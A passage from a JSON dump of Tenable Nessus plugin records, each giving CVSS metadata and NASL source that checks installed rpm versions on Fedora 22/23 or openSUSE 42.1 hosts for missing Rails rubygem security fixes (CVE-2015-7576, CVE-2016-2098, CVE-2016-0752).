"AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-01T14:21:59", "description": "Security fix for CVE-2015-7576\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 23 : rubygem-activesupport-4.2.3-3.fc23 (2016-3ede04cd79)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-activesupport", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-3EDE04CD79.NASL", "href": "https://www.tenable.com/plugins/nessus/89523", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-3ede04cd79.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89523);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7576\");\n script_xref(name:\"FEDORA\", value:\"2016-3ede04cd79\");\n\n script_name(english:\"Fedora 23 : rubygem-activesupport-4.2.3-3.fc23 (2016-3ede04cd79)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-7576\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301933\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178068.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dbac83d6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-activesupport package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-activesupport\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"rubygem-activesupport-4.2.3-3.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-activesupport\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T16:34:29", "description": "This update for rubygem-actionview-4_2 fixes the following issues :\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution vulnerability in Action Pack (boo#968849)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-03-17T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-actionview-4_2 (openSUSE-2016-352)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-doc-4_2", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-352.NASL", "href": "https://www.tenable.com/plugins/nessus/89977", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-352.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89977);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-2098\");\n\n script_name(english:\"openSUSE Security Update : rubygem-actionview-4_2 (openSUSE-2016-352)\");\n script_summary(english:\"Check for the openSUSE-2016-352 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for rubygem-actionview-4_2 fixes the following issues :\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code\n execution vulnerability in Action Pack (boo#968849)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968849\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-actionview-4_2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails ActionPack Inline ERB Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-doc-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-actionview-4_2-4.2.4-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-actionview-doc-4_2-4.2.4-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.1-rubygem-actionview-4_2 / ruby2.1-rubygem-actionview-doc-4_2\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T16:35:32", "description": "- Fix rails-html-sanitizer v1.0.3 compatibility. * Fix code injection vulnerability (CVE-2016-2098).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-03-18T00:00:00", "type": "nessus", "title": "Fedora 23 : rubygem-actionpack-4.2.3-5.fc23 / rubygem-actionview-4.2.3-5.fc23 (2016-f6af14570f)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionpack", "p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-F6AF14570F.NASL", "href": "https://www.tenable.com/plugins/nessus/90016", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-f6af14570f.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90016);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2098\");\n script_xref(name:\"FEDORA\", value:\"2016-f6af14570f\");\n\n script_name(english:\"Fedora 23 : rubygem-actionpack-4.2.3-5.fc23 / rubygem-actionview-4.2.3-5.fc23 (2016-f6af14570f)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fix rails-html-sanitizer v1.0.3 compatibility. * Fix\n code injection vulnerability (CVE-2016-2098).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1310054\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178984.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2c725a74\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178985.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f493f2b9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected rubygem-actionpack and / or rubygem-actionview\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails ActionPack Inline ERB Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"rubygem-actionpack-4.2.3-5.fc23\")) flag++;\nif (rpm_check(release:\"FC23\", reference:\"rubygem-actionview-4.2.3-5.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionpack / rubygem-actionview\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T16:34:13", "description": "- Fix rails-html-sanitizer v1.0.3 compatibility. * Fix code injection vulnerability (CVE-2016-2098).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-03-18T00:00:00", "type": "nessus", "title": "Fedora 22 : rubygem-actionpack-4.2.0-4.fc22 / rubygem-actionview-4.2.0-5.fc22 (2016-3954061e32)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionpack", "p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-3954061E32.NASL", "href": "https://www.tenable.com/plugins/nessus/90013", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-3954061e32.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90013);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2098\");\n script_xref(name:\"FEDORA\", value:\"2016-3954061e32\");\n\n script_name(english:\"Fedora 22 : rubygem-actionpack-4.2.0-4.fc22 / rubygem-actionview-4.2.0-5.fc22 (2016-3954061e32)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fix rails-html-sanitizer v1.0.3 compatibility. * Fix\n code injection vulnerability (CVE-2016-2098).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1310054\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179025.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e8619985\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179026.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4b85e285\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected rubygem-actionpack and / or rubygem-actionview\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails ActionPack Inline ERB Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"rubygem-actionpack-4.2.0-4.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"rubygem-actionview-4.2.0-5.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionpack / rubygem-actionview\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T16:33:23", "description": "Security fix for CVE-2016-0752\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 22 : rubygem-actionview-4.2.0-3.fc22 (2016-fa0dec2360)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-FA0DEC2360.NASL", "href": "https://www.tenable.com/plugins/nessus/89644", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-fa0dec2360.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89644);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\"CVE-2016-0752\");\n script_xref(name:\"FEDORA\", value:\"2016-fa0dec2360\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Fedora 22 : rubygem-actionview-4.2.0-3.fc22 (2016-fa0dec2360)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Security fix for CVE-2016-0752\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301963\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178044.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?01235df4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rubygem-actionview package.\");\n 